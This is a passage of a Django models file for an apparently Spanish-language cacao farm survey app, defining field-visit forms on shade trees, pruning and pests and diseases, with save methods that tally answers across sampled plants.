pequena = models.FloatField(verbose_name='Pequeña')
mediana = models.FloatField(verbose_name='Mediana')
grande = models.FloatField(verbose_name='Grande')
tipo = models.IntegerField(choices=CHOICE_TIPO_PUNTO)
tipo_de_copa = models.IntegerField(choices=CHOICE_TIPO_COPA_PUNTO)
uso = models.IntegerField(choices=CHOICE_TIPO_USO_PUNTO)
ficha = models.ForeignKey(FichaSombra)
class Meta:
verbose_name_plural = "Punto3"
class Cobertura3(models.Model):
cobertura = models.FloatField('% de cobertura de sombra')
ficha = models.ForeignKey(FichaSombra)
#------------------- fin de punto 3 --------------------------------------
class AnalisisSombra(models.Model):
densidad = models.IntegerField(
choices=(
(1,
'Alta'),
(2,
'Adecuada'),
(3,
'Baja'),
),
verbose_name='Densidad de árboles de sombra')
forma_copa = models.IntegerField(
choices=(
(1,
'Ancha'),
(2,
'Adecuada'),
(3,
'Angosta'),
),
verbose_name='Forma de copa de árboles de sombra')
arreglo = models.IntegerField(choices=((1, 'Uniforme'), (2, 'Desuniforme'),),
verbose_name='Arreglo de árboles')
hojarasca = models.IntegerField(
choices=(
(1,
'Suficiente'),
(2,
'No Suficiente'),
),
verbose_name='Cantidad de hojarasca ')
calidad_hojarasca = models.IntegerField(
choices=(
(1,
'Rico en nutrientes'),
(2,
'Pobre en nutriente'),
),
verbose_name='Calidad de hojarasca ')
competencia = models.IntegerField(
choices=(
(1,
'Fuerte'),
(2,
'Mediana'),
(3,
'Leve'),
),
verbose_name='Competencia de árboles con cacao')
Problema = models.IntegerField(
choices=(
(1,
'Cobertura'),
(2,
'Mal arreglo'),
(3,
'Competencia'),
(4,
'Densidad Tipo de árboles'),
(5,
'Ninguno')),
verbose_name='Problema de sombra')
ficha = models.ForeignKey(FichaSombra)
class Meta:
verbose_name_plural = "Análisis sobre sombra y árboles de sombra"
CHOICE_ACCIONES_SOMBRA = (
(1, 'Reducir la sombra'),
(2, 'Aumentar la sombra'),
(3, 'Ninguna'),
)
CHOICE_PODA = (
(1, 'Si'),
(2, 'No'),
)
CHOICE_TODO = (
(1, 'En todo la parcela '),
(2, 'Solo en una parte de la parcela'),
)
class AccionesSombra(models.Model):
accion = models.IntegerField(
choices=CHOICE_ACCIONES_SOMBRA,
verbose_name="Que acciones hay que realizar ")
ficha = models.ForeignKey(FichaSombra)
class ReducirSombra(models.Model):
poda = models.IntegerField(
choices=CHOICE_PODA,
verbose_name="Podando árboles")
poda_cuales = models.CharField(max_length=350)
eliminando = models.IntegerField(
choices=CHOICE_PODA,
verbose_name="Cambiando árboles")
eliminando_cuales = models.CharField(max_length=350)
todo = models.IntegerField(
choices=CHOICE_TODO,
verbose_name="En todo la parcela o Solo en una parte de la parcela")
que_parte = models.CharField(max_length=250)
ficha = models.ForeignKey(FichaSombra)
class Meta:
verbose_name_plural = "Si marca reducir la sombra"
class AumentarSombra(models.Model):
sembrando = models.IntegerField(
choices=CHOICE_PODA,
verbose_name="Sembrando árboles")
sembrando_cuales = models.CharField(max_length=350)
cambiando = models.IntegerField(
choices=CHOICE_PODA,
verbose_name="Cambiando árboles")
cambiando_cuales = models.CharField(max_length=350)
todo = models.IntegerField(
choices=CHOICE_TODO,
verbose_name="En todo la parcela o Solo en una parte de la parcela")
que_parte = models.CharField(max_length=250)
ficha = models.ForeignKey(FichaSombra)
class Meta:
verbose_name_plural = "Si marca aumentar la sombra"
class ManejoSombra(models.Model):
herramientas = models.IntegerField(
choices=CHOICE_PODA,
verbose_name="Tiene herramienta para manejo de sombra? ")
formacion = models.IntegerField(
choices=CHOICE_PODA,
verbose_name="Tiene formación para manejo de sombra? ")
ficha = models.ForeignKey(FichaSombra)
class Meta:
verbose_name = "Herramienta y formación de sombras"
#-------------------------- fin ficha sombra ------------------------------
class FichaPoda(models.Model):
productor = models.ForeignKey(
Persona,
verbose_name='Nombre de productor o productora',
related_name='setproductor')
tecnico = models.ForeignKey(
Persona,
verbose_name='Nombre de técnico',
related_name='settecnico')
fecha_visita = models.DateField()
def __unicode__(self):
return self.productor.nombre
class Meta:
verbose_name = "Ficha poda"
verbose_name_plural = "Ficha poda"
CHOICE_SI_NO = (
(1, 'Si'),
(2, 'No'),
)
CHOICE_PRODUCCION = (
(1, 'Alta'),
(2, 'Media'),
(3, 'Baja'),
)
CHOICE_PLANTAS1 = (
(1, 'Altura en mt'),
(2, 'Ancho de copa mt'),
)
CHOICE_PLANTAS2 = (
(1,
'Formación de horqueta'),
(2,
'Ramas en contacto '),
(3,
'Ramas entrecruzadas'),
(4,
'Ramas cercanas al suelo'),
(5,
'Chupones'),
(6,
'Penetración de Luz'),
)
CHOICE_PLANTAS3 = (
(1, 'Nivel de producción'),
)
class Punto1A(models.Model):
plantas = models.IntegerField(choices=CHOICE_PLANTAS1)
uno = models.FloatField(verbose_name='1')
dos = models.FloatField(verbose_name='2')
tres = models.FloatField(verbose_name='3')
cuatro = models.FloatField(verbose_name='4')
cinco = models.FloatField(verbose_name='5')
seis = models.FloatField(verbose_name='6')
siete = models.FloatField(verbose_name='7')
ocho = models.FloatField(verbose_name='8')
nueve = models.FloatField(verbose_name='9')
diez = models.FloatField(null=True, blank=True, verbose_name='10')
ficha = models.ForeignKey(FichaPoda)
def __unicode__(self):
return self.get_plantas_display()
class Punto1B(models.Model):
plantas = models.IntegerField(choices=CHOICE_PLANTAS2)
uno = models.IntegerField(choices=CHOICE_SI_NO, verbose_name='1')
dos = models.IntegerField(choices=CHOICE_SI_NO, verbose_name='2')
tres = models.IntegerField(choices=CHOICE_SI_NO, verbose_name='3')
cuatro = models.IntegerField(choices=CHOICE_SI_NO, verbose_name='4')
cinco = models.IntegerField(choices=CHOICE_SI_NO, verbose_name='5')
seis = models.IntegerField(choices=CHOICE_SI_NO, verbose_name='6')
siete = models.IntegerField(choices=CHOICE_SI_NO, verbose_name='7')
ocho = models.IntegerField(choices=CHOICE_SI_NO, verbose_name='8')
nueve = models.IntegerField(choices=CHOICE_SI_NO, verbose_name='9')
diez = models.IntegerField(choices=CHOICE_SI_NO, verbose_name='10', null=True, blank=True)
ficha = models.ForeignKey(FichaPoda)
def __unicode__(self):
return self.get_plantas_display()
class Punto1C(models.Model):
plantas = models.IntegerField(choices=CHOICE_PLANTAS3)
uno = models.IntegerField(choices=CHOICE_PRODUCCION, verbose_name='1')
dos = models.IntegerField(choices=CHOICE_PRODUCCION, verbose_name='2')
tres = models.IntegerField(choices=CHOICE_PRODUCCION, verbose_name='3')
cuatro = models.IntegerField(choices=CHOICE_PRODUCCION, verbose_name='4')
cinco = models.IntegerField(choices=CHOICE_PRODUCCION, verbose_name='5')
seis = models.IntegerField(choices=CHOICE_PRODUCCION, verbose_name='6')
siete = models.IntegerField(choices=CHOICE_PRODUCCION, verbose_name='7')
ocho = models.IntegerField(choices=CHOICE_PRODUCCION, verbose_name='8')
nueve = models.IntegerField(choices=CHOICE_PRODUCCION, verbose_name='9')
diez = models.IntegerField(choices=CHOICE_PRODUCCION, verbose_name='10', null=True, blank=True)
ficha = models.ForeignKey(FichaPoda)
def __unicode__(self):
return self.get_plantas_display()
#----------------------------- fin del punto 1 ---------------------------
class Punto2A(models.Model):
plantas = models.IntegerField(choices=CHOICE_PLANTAS1)
uno = models.FloatField(verbose_name='1')
dos = models.FloatField(verbose_name='2')
tres = models.FloatField(verbose_name='3')
cuatro = models.FloatField(verbose_name='4')
cinco = models.FloatField(verbose_name='5')
seis = models.FloatField(verbose_name='6')
siete = models.FloatField(verbose_name='7')
ocho = models.FloatField(verbose_name='8')
nueve = models.FloatField(verbose_name='9')
diez = models.FloatField(null=True, blank=True, verbose_name='10')
ficha = models.ForeignKey(FichaPoda)
def __unicode__(self):
return self.get_plantas_display()
class Punto2B(models.Model):
plantas = models.IntegerField(choices=CHOICE_PLANTAS2)
uno = models.IntegerField(choices=CHOICE_SI_NO, verbose_name='1')
dos = models.IntegerField(choices=CHOICE_SI_NO, verbose_name='2')
tres = models.IntegerField(choices=CHOICE_SI_NO, verbose_name='3')
cuatro = models.IntegerField(choices=CHOICE_SI_NO, verbose_name='4')
cinco = models.IntegerField(choices=CHOICE_SI_NO, verbose_name='5')
seis = models.IntegerField(choices=CHOICE_SI_NO, verbose_name='6')
siete = models.IntegerField(choices=CHOICE_SI_NO, verbose_name='7')
ocho = models.IntegerField(choices=CHOICE_SI_NO, verbose_name='8')
nueve = models.IntegerField(choices=CHOICE_SI_NO, verbose_name='9')
diez = models.IntegerField(choices=CHOICE_SI_NO, verbose_name='10', null=True, blank=True)
ficha = models.ForeignKey(FichaPoda)
def __unicode__(self):
return self.get_plantas_display()
class Punto2C(models.Model):
plantas = models.IntegerField(choices=CHOICE_PLANTAS3)
uno = models.IntegerField(choices=CHOICE_PRODUCCION, verbose_name='1')
dos = models.IntegerField(choices=CHOICE_PRODUCCION, verbose_name='2')
tres = models.IntegerField(choices=CHOICE_PRODUCCION, verbose_name='3')
cuatro = models.IntegerField(choices=CHOICE_PRODUCCION, verbose_name='4')
cinco = models.IntegerField(choices=CHOICE_PRODUCCION, verbose_name='5')
seis = models.IntegerField(choices=CHOICE_PRODUCCION, verbose_name='6')
siete = models.IntegerField(choices=CHOICE_PRODUCCION, verbose_name='7')
ocho = models.IntegerField(choices=CHOICE_PRODUCCION, verbose_name='8')
nueve = models.IntegerField(choices=CHOICE_PRODUCCION, verbose_name='9')
diez = models.IntegerField(choices=CHOICE_PRODUCCION, verbose_name='10', null=True, blank=True)
ficha = models.ForeignKey(FichaPoda)
def __unicode__(self):
return self.get_plantas_display()
#------------ fin del punto 2 ----------------------------
class Punto3A(models.Model):
plantas = models.IntegerField(choices=CHOICE_PLANTAS1)
uno = models.FloatField(verbose_name='1')
dos = models.FloatField(verbose_name='2')
tres = models.FloatField(verbose_name='3')
cuatro = models.FloatField(verbose_name='4')
cinco = models.FloatField(verbose_name='5')
seis = models.FloatField(verbose_name='6')
siete = models.FloatField(verbose_name='7')
ocho = models.FloatField(verbose_name='8')
nueve = models.FloatField(verbose_name='9')
diez = models.FloatField(null=True, blank=True, verbose_name='10')
ficha = models.ForeignKey(FichaPoda)
def __unicode__(self):
return self.get_plantas_display()
class Punto3B(models.Model):
plantas = models.IntegerField(choices=CHOICE_PLANTAS2)
uno = models.IntegerField(choices=CHOICE_SI_NO, verbose_name='1')
dos = models.IntegerField(choices=CHOICE_SI_NO, verbose_name='2')
tres = models.IntegerField(choices=CHOICE_SI_NO, verbose_name='3')
cuatro = models.IntegerField(choices=CHOICE_SI_NO, verbose_name='4')
cinco = models.IntegerField(choices=CHOICE_SI_NO, verbose_name='5')
seis = models.IntegerField(choices=CHOICE_SI_NO, verbose_name='6')
siete = models.IntegerField(choices=CHOICE_SI_NO, verbose_name='7')
ocho = models.IntegerField(choices=CHOICE_SI_NO, verbose_name='8')
nueve = models.IntegerField(choices=CHOICE_SI_NO, verbose_name='9')
diez = models.IntegerField(choices=CHOICE_SI_NO, verbose_name='10', null=True, blank=True)
ficha = models.ForeignKey(FichaPoda)
def __unicode__(self):
return self.get_plantas_display()
class Punto3C(models.Model):
plantas = models.IntegerField(choices=CHOICE_PLANTAS3)
uno = models.IntegerField(choices=CHOICE_PRODUCCION, verbose_name='1')
dos = models.IntegerField(choices=CHOICE_PRODUCCION, verbose_name='2')
tres = models.IntegerField(choices=CHOICE_PRODUCCION, verbose_name='3')
cuatro = models.IntegerField(choices=CHOICE_PRODUCCION, verbose_name='4')
cinco = models.IntegerField(choices=CHOICE_PRODUCCION, verbose_name='5')
seis = models.IntegerField(choices=CHOICE_PRODUCCION, verbose_name='6')
siete = models.IntegerField(choices=CHOICE_PRODUCCION, verbose_name='7')
ocho = models.IntegerField(choices=CHOICE_PRODUCCION, verbose_name='8')
nueve = models.IntegerField(choices=CHOICE_PRODUCCION, verbose_name='9')
diez = models.IntegerField(choices=CHOICE_PRODUCCION, verbose_name='10', null=True, blank=True)
ficha = models.ForeignKey(FichaPoda)
def __unicode__(self):
return self.get_plantas_display()
# -------------------- fin punto 3 ----------------------------
CHOICES_PROBLEMA_PLANTA = (('A', 'Altura'),
('B', 'Ancho'),
('C', 'Ramas'),
('D', 'Horqueta'),
('E', 'Chupones'),
('F', 'Poca entrada de Luz'),
('G', 'Baja productividad'),
('H', 'Ninguna'),
)
CHOICES_TIPO_PODA = (('A', 'Poda de copa'),
('B', 'Poda de ramas'),
('C', 'Ramas'),
('D', 'Formar horquetas'),
('E', 'Deschuponar'),
('F', 'Ninguna'),
)
CHOICE_REALIZA_PODA = (
(1, 'En toda la parcela'),
(2, 'En Varios partes'),
(3, 'En algunas partes'), )
CHOICE_VIGOR = (
(1, 'Todas'),
(2, 'Algunas'),
(3, 'Ninguna'), )
CHOICE_ENTRADA_LUZ = (
(1, 'Poda de copa'),
(2, 'Quitar ramas entrecruzadas'),
(3, 'Arreglar la sombra'),
)
CHOICES_FECHA_PODA = (('A', 'Enero'),
('B', 'Febrero'),
('C', 'Marzo'),
('D', 'Abril'),
('E', 'Mayo'),
('F', 'Junio'),
('G', 'Julio'),
('H', 'Agosto'),
('I', 'Septiembre'),
('J', 'Octubre'),
('K', 'Noviembre'),
('L', 'Diciembre'),
)
class AnalisisPoda(models.Model):
campo1 = MultiSelectField(choices=CHOICES_PROBLEMA_PLANTA, verbose_name='¿Cuáles son los problemas principales en cuanto a las estructuras de las plantas?')
campo2 = MultiSelectField(choices=CHOICES_TIPO_PODA, verbose_name='¿Qué tipo de poda podemos aplicar para mejorar la estructura de las plantas?')
campo3 = models.IntegerField(choices=CHOICE_REALIZA_PODA, verbose_name='¿Dónde se va a realizar la poda para mejorar la estructura de las plantas?')
campo4 = models.IntegerField(choices=CHOICE_VIGOR, verbose_name='Las plantas tienen suficiente vigor, hojas y ramas para ser podadas?')
campo5 = models.IntegerField(choices=CHOICE_ENTRADA_LUZ, verbose_name='¿Cómo podemos mejorar la entrada de luz en las plantas con la poda?')
campo6 = MultiSelectField(choices=CHOICES_FECHA_PODA, verbose_name='¿Cuándo se van a realizar las podas?')
ficha = models.ForeignKey(FichaPoda)
def __unicode__(self):
return 'Analisis'
class Meta:
verbose_name_plural = 'Análisis de poda y acciones'
class ManejoPoda(models.Model):
herramientas = models.IntegerField(
choices=CHOICE_PODA,
verbose_name="Tiene herramienta para manejo de poda? ")
formacion = models.IntegerField(
choices=CHOICE_PODA,
verbose_name="Tiene formación para manejo de poda? ")
ficha = models.ForeignKey(FichaPoda)
class Meta:
verbose_name = "Herramienta y formación de poda"
# ---------------------------- fin de ficha poda ------------------------------
class FichaPlaga(models.Model):
productor = models.ForeignKey(Persona,
verbose_name='Nombre de productor o productora',
related_name='persona_productor_plaga')
tecnico = models.ForeignKey(Persona,
verbose_name='Nombre de técnico',
related_name='persona_tecnico_plaga')
fecha_visita = models.DateField()
def __unicode__(self):
return self.productor.nombre
class Meta:
verbose_name = "Ficha plaga"
verbose_name_plural = "Ficha plaga"
CHOICE_ENFERMEDADES_CACAOTALES = (
(1, 'Monilia'),
(2, 'Mazorca negra'),
(3, 'Mal de machete'),
(4, 'Mal de talluelo en el vivero'),
(5, 'Barrenadores de tallo'),
(6, 'Zompopos'),
(7, 'Chupadores o áfidos'),
(8, 'Escarabajos'),
(9, 'Comején'),
(10, 'Ardillas'),
(11, 'Otros'),
)
class PlagasEnfermedad(models.Model):
plagas = models.IntegerField(choices=CHOICE_ENFERMEDADES_CACAOTALES,
blank=True, null=True, verbose_name="Plagas y enfermedades")
visto = models.IntegerField(choices=CHOICE_SI_NO,
blank=True, null=True, verbose_name="He visto en mi cacaotal")
dano = models.IntegerField(choices=CHOICE_SI_NO,
blank=True, null=True, verbose_name="Hace daño año con año")
promedio = models.FloatField("¿Promedio nivel de daño en %?")
ficha = models.ForeignKey(FichaPlaga)
def __unicode__(self):
return u"PlagasEnfermedad"
CHOICE_ACCIONES_ENFERMEDADES = (
(1, 'Recuento de plagas'),
(2, 'Cortar las mazorcas enfermas'),
(3, 'Abonar las plantas'),
(4, 'Aplicar Caldos'),
(5, 'Aplicar Fungicidas'),
(6, 'Manejo de sombra'),
(7, 'Podar las plantas de cacao'),
(8, 'Aplicar venenos para Zompopo'),
(9, 'Control de Comején'),
(10, 'Ahuyar Ardillas'),
(11, 'Otras'),
)
class AccionesEnfermedad(models.Model):
plagas_acciones = models.IntegerField(choices=CHOICE_ACCIONES_ENFERMEDADES,
blank=True, null=True, verbose_name="Manejo de Plagas y enfermedadess")
realiza_manejo = models.IntegerField(choices=CHOICE_SI_NO,
blank=True, null=True, verbose_name="Realiza en manejo")
cuantas_veces = models.IntegerField(blank=True, null=True,
verbose_name="Cuantas veces realizan el manejo")
meses = MultiSelectField(choices=CHOICES_FECHA_PODA,
verbose_name='En qué meses realizan el manejo')
ficha = models.ForeignKey(FichaPlaga)
def __unicode__(self):
return u"AccionesEnfermedad"
class Meta:
verbose_name = "ACCIONES MANEJO DE PLAGAS Y ENFERMEDADE"
CHOICE_ORIENTACION = (
("A", 'Técnico'),
("B", 'Casa comercial'),
("C", 'Cooperativa'),
("D", 'Otros productores'),
("E", 'Experiencia propia/costumbres'),
("F", 'Otros medio de comunicación'),
)
class Orientacion(models.Model):
fuentes = MultiSelectField(choices=CHOICE_ORIENTACION,
verbose_name='3. Las fuentes de orientación para manejo de las plagas y enfermedades')
ficha = models.ForeignKey(FichaPlaga)
def __unicode__(self):
return u"Orientacion"
CHOICE_OBSERVACION_PUNTO1 = (
(1, 'Monilia'),
(2, 'Mazorca Negra'),
(3, 'Mal de machete'),
(4, 'Daño de ardilla'),
(5, 'Daño de barrenador'),
(6, 'Chupadores'),
(7, 'Daño de zompopo'),
(8, 'Bejuco'),
(9, 'Tanda'),
(10, 'Daño de comején'),
(11, 'Daño de minador de la hoja'),
(12, 'Daño por lana'),
(13, 'Otros'),
)
class ObservacionPunto1(models.Model):
planta = models.IntegerField(choices=CHOICE_OBSERVACION_PUNTO1,
blank=True, null=True)
uno = models.IntegerField(choices=CHOICE_SI_NO, blank=True, null=True)
dos = models.IntegerField(choices=CHOICE_SI_NO, blank=True, null=True)
tres = models.IntegerField(choices=CHOICE_SI_NO, blank=True, null=True)
cuatro = models.IntegerField(choices=CHOICE_SI_NO, blank=True, null=True)
cinco = models.IntegerField(choices=CHOICE_SI_NO, blank=True, null=True)
seis = models.IntegerField(choices=CHOICE_SI_NO, blank=True, null=True)
siete = models.IntegerField(choices=CHOICE_SI_NO, blank=True, null=True)
ocho = models.IntegerField(choices=CHOICE_SI_NO, blank=True, null=True)
nueve = models.IntegerField(choices=CHOICE_SI_NO, blank=True, null=True)
dies = models.IntegerField(choices=CHOICE_SI_NO, blank=True, null=True, verbose_name='Diez')
contador = models.IntegerField(editable=False, null=True, blank=True)
ficha = models.ForeignKey(FichaPlaga)
def save(self, *args, **kwargs):
contar = 0
if self.uno == 1:
contar += 1
if self.dos == 1:
contar += 1
if self.tres == 1:
contar += 1
if self.cuatro == 1:
contar += 1
if self.cinco == 1:
contar += 1
if self.seis == 1:
contar += 1
if self.siete == 1:
contar += 1
if self.ocho == 1:
contar += 1
if self.nueve == 1:
contar += 1
if self.dies == 1:
contar += 1
self.contador = contar
super(ObservacionPunto1, self).save(*args, **kwargs)
def __unicode__(self):
return u"Punto1"
class ObservacionPunto1Nivel(models.Model):
planta = models.IntegerField(choices=CHOICE_PLANTAS3)
uno = models.IntegerField(choices=CHOICE_PRODUCCION,
blank=True, null=True)
dos = models.IntegerField(choices=CHOICE_PRODUCCION,
blank=True, null=True)
tres = models.IntegerField(choices=CHOICE_PRODUCCION,
blank=True, null=True)
cuatro = models.IntegerField(choices=CHOICE_PRODUCCION,
blank=True, null=True)
cinco = models.IntegerField(choices=CHOICE_PRODUCCION,
blank=True, null=True)
seis = models.IntegerField(choices=CHOICE_PRODUCCION,
blank=True, null=True)
siete = models.IntegerField(choices=CHOICE_PRODUCCION,
blank=True, null=True)
ocho = models.IntegerField(choices=CHOICE_PRODUCCION,
blank=True, null=True)
nueve = models.IntegerField(choices=CHOICE_PRODUCCION,
blank=True, null=True)
dies = models.IntegerField(choices=CHOICE_PRODUCCION,
blank=True, null=True)
alta = models.IntegerField(editable=False, null=True, blank=True)
media = models.IntegerField(editable=False, null=True, blank=True)
baja = models.IntegerField(editable=False, null=True, blank=True)
ficha = models.ForeignKey(FichaPlaga)
def save(self, *args, **kwargs):
contar_alta = 0
if self.uno == 1:
contar_alta += 1
if self.dos == 1:
contar_alta += 1
if self.tres == 1:
contar_alta += 1
if self.cuatro == 1:
contar_alta += 1
if self.cinco == 1:
contar_alta += 1
if self.seis == 1:
contar_alta += 1
if self.siete == 1:
contar_alta += 1
if self.ocho == 1:
contar_alta += 1
if self.nueve == 1:
contar_alta += 1
if self.dies == 1:
contar_alta += 1
self.alta = contar_alta
contar_media = 0
if self.uno == 2:
contar_media += 1
if self.dos == 2:
contar_media += 1
if self.tres == 2:
contar_media += 1
if self.cuatro == 2:
contar_media += 1
if self.cinco == 2:
contar_media += 1
if self.seis == 2:
contar_media += 1
if self.siete == 2:
contar_media += 1
if self.ocho == 2:
contar_media += 1
if self.nueve == 2:
contar_media += 1
if self.dies == 2:
contar_media += 1
self.media = contar_media
contar_baja = 0
if self.uno == 3:
contar_baja += 1
if self.dos == 3:
contar_baja += 1
if self.tres == 3:
contar_baja += 1
if self.cuatro == 3:
contar_baja += 1
if self.cinco == 3:
contar_baja += 1
if self.seis == 3:
contar_baja += 1
if self.siete == 3:
contar_baja += 1
if self.ocho == 3:
contar_baja += 1
if self.nueve == 3:
contar_baja += 1
if self.dies == 3:
contar_baja += 1
self.baja = contar_baja
super(ObservacionPunto1Nivel, self).save(*args, **kwargs)
def __unicode__(self):
return u"Punto1 nivel produccion"
class ObservacionPunto2(models.Model):
planta = models.IntegerField(choices=CHOICE_OBSERVACION_PUNTO1,
blank=True, null=True)
uno = models.IntegerField(choices=CHOICE_SI_NO, blank=True, null=True)
dos = models.IntegerField(choices=CHOICE_SI_NO, blank=True, null=True)
tres = models.IntegerField(choices=CHOICE_SI_NO, blank=True, null=True)
cuatro = models.IntegerField(choices=CHOICE_SI_NO, blank=True, null=True)
cinco = models.IntegerField(choices=CHOICE_SI_NO, blank=True, null=True)
seis = models.IntegerField(choices=CHOICE_SI_NO, blank=True, null=True)
siete = models.IntegerField(choices=CHOICE_SI_NO, blank=True, null=True)
ocho = models.IntegerField(choices=CHOICE_SI_NO, blank=True, null=True)
nueve = models.IntegerField(choices=CHOICE_SI_NO, blank=True, null=True)
dies = models.IntegerField(choices=CHOICE_SI_NO, blank=True, null=True)
contador = models.IntegerField(editable=False, null=True, blank=True)
ficha = models.ForeignKey(FichaPlaga)
def save(self, *args, **kwargs):
contar = 0
if self.uno == 1:
contar += 1
if self.dos == 1:
contar += 1
if self.tres == 1:
contar += 1
if self.cuatro == 1:
contar += 1
if self.cinco == 1:
contar += 1
if self.seis == 1:
contar += 1
if self.siete == 1:
contar += 1
if self.ocho == 1:
contar += 1
if self.nueve == 1:
contar += 1
if self.dies == 1:
contar += 1
self.contador = contar
super(ObservacionPunto2, self).save(*args, **kwargs)
def __unicode__(self):
return u"Punto2"
class ObservacionPunto2Nivel(models.Model):
planta = models.IntegerField(choices=CHOICE_PLANTAS3)
uno = models.IntegerField(choices=CHOICE_PRODUCCION,
blank=True, null=True)
dos = models.IntegerField(choices=CHOICE_PRODUCCION,
blank=True, null=True)
tres = models.IntegerField(choices=CHOICE_PRODUCCION,
blank=True, null=True)
cuatro = models.IntegerField(choices=CHOICE_PRODUCCION,
blank=True, null=True)
cinco = models.IntegerField(choices=CHOICE_PRODUCCION,
blank=True, null=True)
seis = models.IntegerField(choices=CHOICE_PRODUCCION,
blank=True, null=True)
siete = models.IntegerField(choices=CHOICE_PRODUCCION,
blank=True, null=True)
ocho = models.IntegerField(choices=CHOICE_PRODUCCION,
blank=True, null=True)
nueve = models.IntegerField(choices=CHOICE_PRODUCCION,
blank=True, null=True)
dies = models.IntegerField(choices=CHOICE_PRODUCCION,
blank=True, null=True)
alta = models.IntegerField(editable=False, null=True, blank=True)
media = models.IntegerField(editable=False, null=True, blank=True)
baja = models.IntegerField(editable=False, null=True, blank=True)
ficha = models.ForeignKey(FichaPlaga)
def save(self, *args, **kwargs):
contar_alta = 0
if self.uno == 1:
contar_alta += 1
if self.dos == 1:
contar_alta += 1
if self.tres == 1:
contar_alta += 1
if self.cuatro == 1:
contar_alta += 1
if self.cinco == 1:
contar_alta += 1
if self.seis == 1:
contar_alta += 1
if self.siete == 1:
contar_alta += 1
if self.ocho == 1:
contar_alta += 1
if self.nueve == 1:
contar_alta += 1
if self.dies == 1:
contar_alta += 1
self.alta = contar_alta
contar_media = 0
if self.uno == 2:
contar_media += 1
if self.dos == 2:
contar_media += 1
if self.tres == 2:
contar_media += 1
if self.cuatro == 2:
contar_media += 1
if self.cinco == 2:
contar_media += 1
if self.seis == 2:
contar_media += 1
if self.siete == 2:
contar_media += 1
if self.ocho == 2:
contar_media += 1
if self.nueve == 2:
contar_media += 1
if self.dies == 2:
contar_media += 1
self.media = contar_media
contar_baja = 0
if self.uno == 3:
contar_baja += 1
if self.dos == 3:
contar_baja += 1
if self.tres == 3:
contar_baja += 1
if self.cuatro == 3:
contar_baja += 1
if self.cinco == 3:
contar_baja += 1
if self.seis == 3:
contar_baja += 1
if self.siete == 3:
contar_baja += 1
if self.ocho == 3:
contar_baja += 1
if self.nueve == 3:
contar_baja += 1
if self.dies == 3:
contar_baja += 1
self.baja = contar_baja
super(ObservacionPunto2Nivel, self).save(*args, **kwargs)
def __unicode__(self):
return u"Punto2 nivel produccion"
class ObservacionPunto3(models.Model):
planta = models.IntegerField(choices=CHOICE_OBSERVACION_PUNTO1,
blank=True, null=True)
uno = models.IntegerField(choices=CHOICE_SI_NO, blank=True, null=True)
dos = models.IntegerField(choices=CHOICE_SI_NO, blank=True, null=True)
tres = models.IntegerField(choices=CHOICE_SI_NO, blank=True, null=True)
cuatro = models.IntegerField(choices=CHOICE_SI_NO, blank=True, null=True)
cinco = models.IntegerField(choices=CHOICE_SI_NO, blank=True, null=True)
seis = models.IntegerField(choices=CHOICE_SI_NO, blank=True, null=True)
siete = models.IntegerField(choices=CHOICE_SI_NO, blank=True, null=True)
ocho = models.IntegerField(choices=CHOICE_SI_NO, blank=True, null=True)
nueve = models.IntegerField(choices=CHOICE_SI_NO, blank=True, null=True)
dies = models.IntegerField(choices=CHOICE_SI_NO, blank=True, null=True)
contador = models.IntegerField(editable=False, null=True, blank=True)
ficha = models.ForeignKey(FichaPlaga)
def save(self, *args, **kwargs):
contar = 0
if self.uno == 1:
contar += 1
if self.dos == 1:
contar += 1
if self.tres == 1:
contar += 1
if self.cuatro == 1:
contar += 1
if self.cinco == 1:
contar += 1
if self.seis == 1:
contar += 1
if self.siete == 1:
contar += 1
if self.ocho == 1:
contar += 1
if self.nueve == 1:
contar += 1
if self.dies == 1:
contar += 1
self.contador = contar
super(ObservacionPunto3, self).save(*args, **kwargs)
def __unicode__(self):
return u"Punto3"
class ObservacionPunto3Nivel(models.Model):
planta = models.IntegerField(choices=CHOICE_PLANTAS3)
uno = models.IntegerField(choices=CHOICE_PRODUCCION,
blank=True, null=True)
dos = models.IntegerField(choices=CHOICE_PRODUCCION,
blank=True, null=True)
tres = models.IntegerField(choices=CHOICE_PRODUCCION,
blank=True, null=True)
cuatro = models.IntegerField(choices=CHOICE_PRODUCCION,
blank=True, null=True)
cinco = models.IntegerField(choices=CHOICE_PRODUCCION,
blank=True, null=True)
seis = models.IntegerField(choices=CHOICE_PRODUCCION,
blank=True, null=True)
siete = models.IntegerField(choices=CHOICE_PRODUCCION,
blank=True, null=True)
ocho = models.IntegerField(choices=CHOICE_PRODUCCION,
blank=True, null=True)
nueve = models.IntegerField(choices=CHOICE_PRODUCCION,
blank=True, null=True)
dies = models.IntegerField(choices=CHOICE_PRODUCCION,
blank=True, null=True)
alta = models.IntegerField(editable=False, null=True, blank=True)
media = models.IntegerField(editable=False, null=True, blank=True)
baja = models.IntegerField(editable=False, null=True, blank=True)
ficha = models.ForeignKey(FichaPlaga)
def save(self, *args, **kwargs):
contar_alta = 0
if self.uno == 1:
contar_alta += 1
if self.dos == 1:
contar_alta += 1
if self.tres == 1:
contar_alta += 1
if self.cuatro == 1:
contar_alta += 1
if self.cinco == 1:
contar_alta += 1
if self.seis == 1:
contar_alta += 1
if self.siete == 1:
contar_alta += 1
if self.ocho == 1:
contar_alta += 1
if self.nueve == 1:
contar_alta += 1
if self.dies == 1:
contar_alta += 1
self.alta = contar_alta
contar_media = 0
if self.uno == 2:
contar_media += 1
if self.dos == 2:
contar_media += 1
if self.tres == 2:
contar_media += 1
if self.cuatro == 2:
contar_media += 1
if self.cinco == 2:
contar_media += 1
if self.seis == 2:
contar_media += 1
if self.siete == 2:
contar_media += 1
if self.ocho == 2:
contar_media += 1
if self.nueve == 2:
contar_media += 1
if self.dies == 2:
contar_media += 1
self.media = contar_media
contar_baja = 0
if self.uno == 3:
contar_baja += 1
if self.dos == 3:
contar_baja += 1
if self.tres == 3:
contar_baja += 1
if self.cuatro == 3:
contar_baja += 1
if self.cinco == 3:
contar_baja += 1
if self.seis == 3:
contar_baja += 1
if self.siete == 3:
contar_baja += 1
if self.ocho == 3:
contar_baja += 1
if self.nueve == 3:
contar_baja += 1
if self.dies == 3:
contar_baja += 1
self.baja = contar_baja
super(ObservacionPunto3Nivel, self).save(*args, **kwargs)
def __unicode__(self):
return u"Punto3 nivel produccion"
CHOICE_ENFERMEDADES = (
("A", 'Monilia'),
("B", 'Mazorca negra'),
("C", 'Mal de machete'),
("D", 'Mal de talluelo en el vivero'),
("E", 'Barrenadores de tallo'),
("F", 'Zompopos'),
("G", 'Chupadores o áfidos'),
("H", 'Escarabajos'),
